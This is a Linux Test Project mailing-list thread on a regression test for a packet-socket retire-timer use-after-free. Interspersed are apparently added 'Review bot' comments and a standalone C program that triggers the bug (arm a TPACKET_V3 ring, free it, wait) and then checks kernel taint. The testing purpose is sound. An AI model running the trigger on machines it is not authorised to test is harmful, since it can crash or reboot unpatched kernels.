* [LTP] [PATCH] syscalls/setsockopt09: Add another linux git
From: Yang Xu @ 2022-03-03  8:54 UTC (permalink / raw)
  To: ltp

On centos7.9ga, I still hit another crash problem because of a use-after-free in
prb_retire_rx_blk_timer_expired(). Since we free it when the timer expires, this
case will crash after we print the TPASS info.

Signed-off-by: Yang Xu <xuyang2018.jy@fujitsu.com>
---
 testcases/kernel/syscalls/setsockopt/setsockopt09.c | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/testcases/kernel/syscalls/setsockopt/setsockopt09.c b/testcases/kernel/syscalls/setsockopt/setsockopt09.c
index 2fc66ebbc..62c6dea07 100644
--- a/testcases/kernel/syscalls/setsockopt/setsockopt09.c
+++ b/testcases/kernel/syscalls/setsockopt/setsockopt09.c
@@ -19,6 +19,17 @@
  *
  *  net/packet: rx_owner_map depends on pg_vec
  *
+ * It also triggers another use-after-free problem in
+ * prb_retire_rx_blk_timer_expired.
+ *
+ * Kernel crash fixed in:
+ *
+ * commit c800aaf8d869f2b9b47b10c5c312fe19f0a94042
+ * Author: WANG Cong <xiyou.wangcong@gmail.com>
+ * Date:   Mon Jul 24 10:07:32 2017 -0700
+ *
+ * packet: fix use-after-free in prb_retire_rx_blk_timer_expired()
+ *
  */
 
 #define _GNU_SOURCE
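Review bot: the new comment paragraph names the second bug but not its observable symptom, which is the one thing a reader of a failing log needs: per the commit message the retire timer fires after the test has already printed TPASS, so on a kernel without c800aaf8d869 the machine oopses or reboots right after "Nothing bad happened, probably". Add a sentence to the block, e.g. " * On unpatched kernels the crash happens when the retire timer fires," / " * i.e. after the test has already reported TPASS." so nobody reads the TPASS line as a clean pass. The commit reference itself follows the format of the existing ec6af094ea28 entry above it, which is fine.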
@@ -110,6 +121,7 @@ static struct tst_test test = {
 		NULL,
 	},
 	.tags = (const struct tst_tag[]) {
+		{"linux-git", "c800aaf8d869"},
 		{"linux-git", "ec6af094ea28"},
 		{"CVE", "2021-22600"},
 		{}
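Review bot: adding {"linux-git", "c800aaf8d869"} documents the fix, but as the hunk stands the tag is documentation only: nothing in the test can fail on a kernel lacking that commit, because the retire timer runs after the pass result has been reported. Either state that limitation in the comment block, or make the test actually cover it by sleeping longer than tp_retire_blk_tov after the trigger and then checking kernel taint with LTP's tst_taint_init()/tst_taint_check(), the pattern setsockopt06 uses for its socket-timer use-after-free. Keeping the two linux-git tags adjacent, oldest first, as done here is the right order; the existing CVE tag still refers only to ec6af094ea28.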
-- 
2.23.0


-- 
Mailing list info: https://lists.linux.it/listinfo/ltp


* Re: [LTP] [PATCH] syscalls/setsockopt09: Add another linux git
From: xuyang2018.jy @ 2022-03-03  9:11 UTC (permalink / raw)
  To: ltp

Hi All
> On centos7.9ga, I still hit another crash problem because of a use-after-free in
> prb_retire_rx_blk_timer_expired(). Since we free it when the timer expires, this
Using "free" is incorrect; it should be modified as below:
Since we still use the freed resource when the timer expires

Best Regards
Yang Xu
> case will crash after we print the TPASS info.
> 
> Signed-off-by: Yang Xu<xuyang2018.jy@fujitsu.com>
> ---
>   testcases/kernel/syscalls/setsockopt/setsockopt09.c | 12 ++++++++++++
>   1 file changed, 12 insertions(+)
> 
> diff --git a/testcases/kernel/syscalls/setsockopt/setsockopt09.c b/testcases/kernel/syscalls/setsockopt/setsockopt09.c
> index 2fc66ebbc..62c6dea07 100644
> --- a/testcases/kernel/syscalls/setsockopt/setsockopt09.c
> +++ b/testcases/kernel/syscalls/setsockopt/setsockopt09.c
> @@ -19,6 +19,17 @@
>    *
>    *  net/packet: rx_owner_map depends on pg_vec
>    *
> + * It also triggers another use-after-free problem in
> + * prb_retire_rx_blk_timer_expired.
> + *
> + * Kernel crash fixed in:
> + *
> + * commit c800aaf8d869f2b9b47b10c5c312fe19f0a94042
> + * Author: WANG Cong<xiyou.wangcong@gmail.com>
> + * Date:   Mon Jul 24 10:07:32 2017 -0700
> + *
> + * packet: fix use-after-free in prb_retire_rx_blk_timer_expired()
> + *
>    */
> 
>   #define _GNU_SOURCE
> @@ -110,6 +121,7 @@ static struct tst_test test = {
>   		NULL,
>   	},
>   	.tags = (const struct tst_tag[]) {
> +		{"linux-git", "c800aaf8d869"},
>   		{"linux-git", "ec6af094ea28"},
>   		{"CVE", "2021-22600"},
>   		{}


* Re: [LTP] [PATCH] syscalls/setsockopt09: Add another linux git
From: Petr Vorel @ 2022-03-03 14:04 UTC (permalink / raw)
  To: Yang Xu; +Cc: ltp

Hi Xu,

> On centos7.9ga, I still hit another crash problem because of a use-after-free in
> prb_retire_rx_blk_timer_expired(). Since we free it when the timer expires, this
> case will crash after we print the TPASS info.

Reviewed-by: Petr Vorel <pvorel@suse.cz>

LGTM.
I tested two old kernels: the one with the patch survives, the other got rebooted.

BTW funny enough the affected system manages to print "TPASS: Nothing bad
happened, probably" before reboot :).

Kind regards,
Petr


* Re: [LTP] [PATCH] syscalls/setsockopt09: Add another linux git
From: xuyang2018.jy @ 2022-03-04  3:24 UTC (permalink / raw)
  To: Petr Vorel; +Cc: ltp

Hi Petr
> Hi Xu,
>
>> On centos7.9ga, I still hit another crash problem because of a use-after-free in
>> prb_retire_rx_blk_timer_expired(). Since we free it when the timer expires, this
>> case will crash after we print the TPASS info.
>
> Reviewed-by: Petr Vorel<pvorel@suse.cz>
>
> LGTM.
> I tested two old kernels: the one with the patch survives, the other got rebooted.
>
> BTW funny enough the affected system manages to print "TPASS: Nothing bad
> happened, probably" before reboot :).
Yes, it crashes when the timer expires, so it will print TPASS before the reboot.
Also, I tried sleeping 10 ms, but it still prints TPASS and reboots after several
seconds.

I have written it in my commit message, so this should be friendly for
users to know about this situation.

Best Regards
Yang Xu
>
> Kind regards,
> Petr


* Re: [LTP] [PATCH] syscalls/setsockopt09: Add another linux git
From: Petr Vorel @ 2022-03-04  8:01 UTC (permalink / raw)
  To: xuyang2018.jy; +Cc: ltp

> Hi Petr
> > Hi Xu,

> >> On centos7.9ga, I still hit another crash problem because of a use-after-free in
> >> prb_retire_rx_blk_timer_expired(). Since we free it when the timer expires, this
> >> case will crash after we print the TPASS info.

> > Reviewed-by: Petr Vorel<pvorel@suse.cz>

> > LGTM.
> > I tested two old kernels: the one with the patch survives, the other got rebooted.

> > BTW funny enough the affected system manages to print "TPASS: Nothing bad
> > happened, probably" before reboot :).
> Yes, it crashes when the timer expires, so it will print TPASS before the reboot.
> Also, I tried sleeping 10 ms, but it still prints TPASS and reboots after several
> seconds.

> I have written it in my commit message, so this should be friendly for
> users to know about this situation.

Sure, I didn't expect we would be able to fix this (I'm *not* voting for sleep
10+ s). It can just be a bit confusing when you read test logs if the framework
does not clearly show that the system got rebooted (I saw the reset in dmesg but didn't
believe it was caused by this test, due to the TPASS output. Lesson learned :)).

Kind regards,
Petr

> Best Regards
> Yang Xu

> > Kind regards,
> > Petr


* Re: [LTP] [PATCH] syscalls/setsockopt09: Add another linux git
From: xuyang2018.jy @ 2022-03-08 10:04 UTC (permalink / raw)
  To: Petr Vorel; +Cc: ltp

Hi Petr
>> Hi Petr
>>> Hi Xu,
>
>>>> On centos7.9ga, I still hit another crash problem because of a use-after-free in
>>>> prb_retire_rx_blk_timer_expired(). Since we free it when the timer expires, this
>>>> case will crash after we print the TPASS info.
>
>>> Reviewed-by: Petr Vorel<pvorel@suse.cz>
>
>>> LGTM.
>>> I tested two old kernels: the one with the patch survives, the other got rebooted.
>
>>> BTW funny enough the affected system manages to print "TPASS: Nothing bad
>>> happened, probably" before reboot :).
>> Yes, it crashes when the timer expires, so it will print TPASS before the reboot.
>> Also, I tried sleeping 10 ms, but it still prints TPASS and reboots after several
>> seconds.
>
>> I have written it in my commit message, so this should be friendly for
>> users to know about this situation.
>
> Sure, I didn't expect we would be able to fix this (I'm *not* voting for sleep
> 10+ s). It can just be a bit confusing when you read test logs if the framework
> does not clearly show that the system got rebooted (I saw the reset in dmesg but didn't
> believe it was caused by this test, due to the TPASS output. Lesson learned :)).
Yes, it looks confusing.

So, how about testing 100 times in runtest/syscall and runtest/cve like
"cve-2021-22555 setsockopt08 -i 100" does?

PS: I tested it on an old kernel and it works well.

Best Regards
Yang Xu
>
> Kind regards,
> Petr
>
>> Best Regards
>> Yang Xu
>
>>> Kind regards,
>>> Petr


* Re: [LTP] [PATCH] syscalls/setsockopt09: Add another linux git
From: Martin Doucha @ 2022-03-08 10:44 UTC (permalink / raw)
  To: xuyang2018.jy, Petr Vorel; +Cc: ltp

On 04. 03. 22 4:24, xuyang2018.jy@fujitsu.com wrote:
> Hi Petr
>> Hi Xu,
>>
>>> On centos7.9ga, I still hit another crash problem because of a use-after-free in
>>> prb_retire_rx_blk_timer_expired(). Since we free it when the timer expires, this
>>> case will crash after we print the TPASS info.
>>
>> Reviewed-by: Petr Vorel<pvorel@suse.cz>
>>
>> LGTM.
>> I tested two old kernels: the one with the patch survives, the other got rebooted.
>>
>> BTW funny enough the affected system manages to print "TPASS: Nothing bad
>> happened, probably" before reboot :).
> Yes, it crashes when the timer expires, so it will print TPASS before the reboot.
> Also, I tried sleeping 10 ms, but it still prints TPASS and reboots after several
> seconds.

The timeout is controlled by req.tp_retire_blk_tov and the value is in
milliseconds. So usleep(req.tp_retire_blk_tov * 3000) should be enough.

-- 
Martin Doucha   mdoucha@suse.cz
QA Engineer for Software Maintenance
SUSE LINUX, s.r.o.
CORSO IIa
Krizikova 148/34
186 00 Prague 8
Czech Republic


* Re: [LTP] [PATCH] syscalls/setsockopt09: Add another linux git
From: xuyang2018.jy @ 2022-03-09  2:03 UTC (permalink / raw)
  To: Martin Doucha; +Cc: ltp

Hi Martin
> On 04. 03. 22 4:24, xuyang2018.jy@fujitsu.com wrote:
>> Hi Petr
>>> Hi Xu,
>>>
>>>> On centos7.9ga, I still hit another crash problem because of a use-after-free in
>>>> prb_retire_rx_blk_timer_expired(). Since we free it when the timer expires, this
>>>> case will crash after we print the TPASS info.
>>>
>>> Reviewed-by: Petr Vorel<pvorel@suse.cz>
>>>
>>> LGTM.
>>> I tested two old kernels: the one with the patch survives, the other got rebooted.
>>>
>>> BTW funny enough the affected system manages to print "TPASS: Nothing bad
>>> happened, probably" before reboot :).
>> Yes, it crashes when the timer expires, so it will print TPASS before the reboot.
>> Also, I tried sleeping 10 ms, but it still prints TPASS and reboots after several
>> seconds.
>
> The timeout is controlled by req.tp_retire_blk_tov and the value is in
> milliseconds. So usleep(req.tp_retire_blk_tov * 3000) should be enough.
I tested this on my VM; it still can't ensure we hit the old crash before
printing the PASS log.

Best Regards
Yang Xu
>


* Re: [LTP] [PATCH] syscalls/setsockopt09: Add another linux git
From: Martin Doucha @ 2022-03-09 10:51 UTC (permalink / raw)
  To: xuyang2018.jy; +Cc: ltp

On 09. 03. 22 3:03, xuyang2018.jy@fujitsu.com wrote:
> Hi Martin
>> The timeout is controlled by req.tp_retire_blk_tov and the value is in
>> milliseconds. So usleep(req.tp_retire_blk_tov * 3000) should be enough.
> I tested this on my VM; it still can't ensure we hit the old crash before
> printing the PASS log.

That is probably expected. You'll need to make a taint check after the
usleep() to detect failure. See setsockopt06, which tests for a similar
use-after-free in a socket timer.

-- 
Martin Doucha   mdoucha@suse.cz
QA Engineer for Software Maintenance
SUSE LINUX, s.r.o.
CORSO IIa
Krizikova 148/34
186 00 Prague 8
Czech Republic
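
The detection pattern Martin describes here and in his 2022-03-08 reply (wait a multiple of tp_retire_blk_tov, then check kernel taint the way setsockopt06 does) in one self-contained C program. This is an added example, not setsockopt09's code or anything from the LTP project: it uses plain libc instead of LTP's tst_ helpers, the trigger sequence (arm a TPACKET_V3 receive ring with a short retire timeout, then release it with tp_block_nr = 0 while the timer is still armed) is an assumption about how the timer outlives the ring, since the page does not show the test body, and the three-period wait is Martin's suggested multiplier. The taint bit positions are the kernel's TAINT_BAD_PAGE (5), TAINT_DIE (7) and TAINT_WARN (9).

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <linux/if_ether.h>
#include <linux/if_packet.h>

/* Kernel taint flags (bit numbers from the kernel's panic.h). An oops or a
 * WARN() in the retire timer sets one of these, and they stay visible in
 * /proc/sys/kernel/tainted for as long as the box does not reboot. */
#define TAINT_BAD_PAGE (1UL << 5)
#define TAINT_DIE      (1UL << 7)
#define TAINT_WARN     (1UL << 9)
#define TAINT_BAD_MASK (TAINT_BAD_PAGE | TAINT_DIE | TAINT_WARN)

/* Bits of TAINT_BAD_MASK set in `after` but not in `before`. Pre-existing
 * taint (proprietary module, forced load, ...) is ignored on purpose. */
unsigned long new_bad_taint(unsigned long before, unsigned long after)
{
	return (after & ~before) & TAINT_BAD_MASK;
}

/* tp_retire_blk_tov is in milliseconds; wait `mult` timer periods so an
 * armed timer has certainly fired before taint is read. A timespec is
 * returned because usleep() is not required to accept 1 s or more. */
struct timespec retire_wait_ts(unsigned int tov_ms, unsigned int mult)
{
	unsigned long long ns = (unsigned long long)tov_ms * mult * 1000000ULL;
	struct timespec ts;

	ts.tv_sec = (time_t)(ns / 1000000000ULL);
	ts.tv_nsec = (long)(ns % 1000000000ULL);
	return ts;
}

/* Read /proc/sys/kernel/tainted into *out; 0 on success, -errno otherwise. */
int read_tainted(unsigned long *out)
{
	FILE *f = fopen("/proc/sys/kernel/tainted", "r");
	int ret = 0;

	if (!f)
		return -errno;
	if (fscanf(f, "%lu", out) != 1)
		ret = -EIO;
	fclose(f);
	return ret;
}

/* Assumed trigger: arm a TPACKET_V3 rx ring whose block-retire timer fires
 * every tov_ms, then free the ring (tp_block_nr == 0) while the timer is
 * still armed. Needs CAP_NET_RAW; returns 0 or -errno (EPERM unprivileged). */
int trigger_retire_timer(unsigned int tov_ms)
{
	unsigned int page = (unsigned int)sysconf(_SC_PAGESIZE);
	int ver = TPACKET_V3, fd, err = 0;
	struct tpacket_req3 req;

	fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
	if (fd < 0)
		return -errno;
	if (setsockopt(fd, SOL_PACKET, PACKET_VERSION, &ver, sizeof(ver)) < 0) {
		err = -errno;
		goto out;
	}
	memset(&req, 0, sizeof(req));
	req.tp_block_size = page;	/* must be a multiple of PAGE_SIZE */
	req.tp_block_nr = 1;
	req.tp_frame_size = page;
	req.tp_frame_nr = 1;		/* block_size / frame_size * block_nr */
	req.tp_retire_blk_tov = tov_ms;
	if (setsockopt(fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req)) < 0) {
		err = -errno;
		goto out;
	}
	req.tp_block_nr = 0;		/* both counts zero releases the ring */
	req.tp_frame_nr = 0;
	if (setsockopt(fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req)) < 0)
		err = -errno;
out:
	close(fd);
	return err;
}

int main(void)
{
	const unsigned int tov_ms = 100;
	unsigned long before = 0, after = 0;
	struct timespec ts;
	int err = trigger_retire_timer(tov_ms);

	read_tainted(&before);
	if (err) {
		fprintf(stderr, "trigger skipped: %s\n", strerror(-err));
		return 1;
	}
	ts = retire_wait_ts(tov_ms, 3);	/* the bug only shows once the timer runs */
	nanosleep(&ts, NULL);
	if (read_tainted(&after))
		return 1;
	if (new_bad_taint(before, after)) {
		printf("kernel is vulnerable: taint 0x%lx -> 0x%lx\n", before, after);
		return 2;
	}
	printf("nothing bad happened, probably (waited %u ms)\n", tov_ms * 3);
	return 0;
}
```

Run it as root on the kernel under test; without CAP_NET_RAW socket() fails with EPERM and the program says the trigger was skipped rather than printing a misleading pass. Note the caveat from the end of this thread: on a kernel that really oopses in the timer the machine may reset before the taint read ever runs, so a reboot right after the "nothing bad happened" line is itself the failure signal to look for in the console log.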


* Re: [LTP] [PATCH] syscalls/setsockopt09: Add another linux git
From: xuyang2018.jy @ 2022-03-10  6:07 UTC (permalink / raw)
  To: Martin Doucha; +Cc: ltp

Hi Martin
> On 09. 03. 22 3:03, xuyang2018.jy@fujitsu.com wrote:
>> Hi Martin
>>> The timeout is controlled by req.tp_retire_blk_tov and the value is in
>>> milliseconds. So usleep(req.tp_retire_blk_tov * 3000) should be enough.
>> I tested this on my VM; it still can't ensure we hit the old crash before
>> printing the PASS log.
>
> That is probably expected. You'll need to make a taint check after the
> usleep() to detect failure. See setsockopt06, which tests for a similar
> use-after-free in a socket timer.

I added a sleep as in setsockopt06, but it doesn't detect the kernel tainted
state in time and doesn't report "Kernel is vulnerable".

Best Regards
Yang Xu
>

